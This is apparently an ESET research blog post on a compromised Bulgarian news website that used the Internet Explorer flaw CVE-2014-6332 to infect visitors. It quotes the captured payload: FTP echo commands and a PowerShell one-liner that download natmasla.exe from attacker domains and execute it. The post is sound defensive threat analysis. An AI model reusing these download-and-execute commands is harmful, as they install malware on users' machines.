Sign up to our newsletter
Microsoft released a patch last week for a critical vulnerability allowing remote code execution in Internet Explorer. This vulnerability, known as Unicorn bug CVE-2014-6332, and discovered by an IBM X-Force security researcher, is significant because it exploits an old bug present in Internet Explorer versions 3 through 11. This means that most, if not all, Internet Explorer users are vulnerable unless they are using patched systems. It gets worse: the vulnerability not only can be used by an attacker to run arbitrary code on a remote machine, but it can also bypass the Enhanced Protected Mode (EPM) sandbox in IE11 as well as Microsoft’s free anti-exploitation tool, the Enhanced Mitigation Experience Toolkit (EMET).
Earlier this week, a proof-of-concept (PoC) successfully exploiting this vulnerability on Internet Explorer was made publicly available. In fact, this PoC showed that arbitrary code could be run on a machine merely by visiting a specially crafted website, if using an unpatched version of Internet Explorer. It was thus only a matter of time before we started seeing this vulnerability actively used as part of a cybercriminal campaign. Scouring our data, we found several blocked exploitation attempts while our users were browsing a major Bulgarian website. As you might have guessed, the compromised website was using CVE-2014-6332 to install malware on the computers of its unsuspecting visitors.
This news agency website, ranked among the 50 most visited websites in Bulgaria and among the 11,000 first worldwide according to Alexa, might just be part of the first significant in-the-wild use of this vulnerability. As far as we can tell, there is only one page on the website that has been compromised and is serving this exploit, possibly indicating a testing phase. The page is about some TV Reality show winners.
The page source contains an invisible HTML iframe pointing to the exploit:
As seen above, the exploit is hosted on the domain natmasla[.]ru. It is detected by ESET as Win32/Exploit.CVE-2014-6332.A.
The exploit is based on proof-of-concept code published by a Chinese researcher. Here are the credits in this original proof-of-concept:
It is easily modifiable and allows the attacker to write the payload in VBScript.
Strangely, the exploit is actually present two times consecutively. The first time, the payload is:
@echo open carolinasregion.org>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
|powershell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://natmasla[.]ru/ath/sploit/natmasla.exe','%TEMP%\natmasla.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla.exe')|
During our investigation we observed some network difficulties when we tried to fetch the exploit. That could be the reason for the two payloads with different network resources.
The downloaded binary is detected by ESET as Win32/IRCBot.NHR. This malware has numerous capabilities, as launching DDoS attacks, or opening remote shells for the miscreants. As a funny fact, it contains an Einstein’s citation “Anyone who has never made a mistake has never tried anything new.”
Although we were not able to link this particular incident to a known exploit kit, it is a matter of time before mainstream kits integrate this vulnerability. Since all supported versions of Windows were vulnerable to this exploit before the patch was released last week, we can expect this vulnerability conversion rate to be very high. If you haven’t updated Internet Explorer yet, please take time do it right now through Windows Update.
|SHA1||ESET Detection Name|
Author ESET Research, ESET